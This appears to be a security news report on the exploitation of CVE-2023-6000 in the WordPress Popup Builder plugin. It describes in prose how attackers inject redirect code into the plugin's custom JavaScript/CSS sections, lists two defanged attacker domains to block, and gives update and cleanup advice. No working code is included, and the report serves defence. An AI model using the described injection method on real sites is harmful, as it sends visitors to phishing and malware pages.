In recent cybersecurity developments, hackers are taking advantage of a vulnerability within outdated versions of the Popup Builder plugin for WordPress, leading to the infection of over 3,300 websites with harmful code. This exploit, identified as CVE-2023-6000, poses a significant threat to site administrators who have not promptly updated their plugins.
This security concern was initially brought to light in November 2023, with the Popup Builder versions 4.2.3 and older being susceptible to cross-site scripting (XSS) vulnerability. Despite a previous Balada Injector campaign affecting more than 6,700 websites, it appears that not all site admins have acted swiftly to patch this vulnerability.
Sucuri, a leading web security firm, has recently detected a surge in attacks over the past three weeks, targeting the same vulnerability in the Popup Builder plugin. PublicWWW results reveal that the code injections from this latest campaign have been identified in 3,329 WordPress sites, with Sucuri’s own scanners detecting 1,170 infections.
The attackers compromise WordPress sites by injecting malicious code into the Custom JavaScript or Custom CSS sections of the WordPress admin interface. This code is stored within the ‘wp_postmeta’ database table and serves as event handlers for various Popup Builder plugin actions. The injected code’s primary purpose is to redirect visitors to malicious destinations, including phishing pages and sites that drop malware.
To defend against these attacks, it is crucial to block the originating domains, “ttincoming.traveltraffic[.]cc” and “host.cloudsonicwave[.]com.” Additionally, site administrators using the Popup Builder plugin are strongly advised to update to the latest version (currently 4.2.7) to address CVE-2023-6000 and other security issues.
Challenge Ahead:
Despite the urgency, WordPress statistics indicate that over 80,000 active sites continue to use Popup Builder versions 4.1 and older, leaving a substantial attack surface. Site owners must remain vigilant and proactive in upgrading their plugins to ensure the security of their websites.
Mitigation and Recovery:
In the unfortunate event of an infection, the removal process involves deleting malicious entries from the Popup Builder’s custom sections and conducting thorough scans to identify hidden backdoors that could lead to reinfection. Analysts have observed instances where the injected code redirects visitors to specific URLs, emphasizing the potential severity of these attacks.
In the ever-evolving landscape of cybersecurity threats, staying informed and proactive is crucial. The WordPress Popup Builder plugin vulnerability serves as a stark reminder of the importance of timely updates and diligent security practices to safeguard websites against malicious exploits. Site administrators must take immediate action to secure their online assets and protect visitors from potential harm.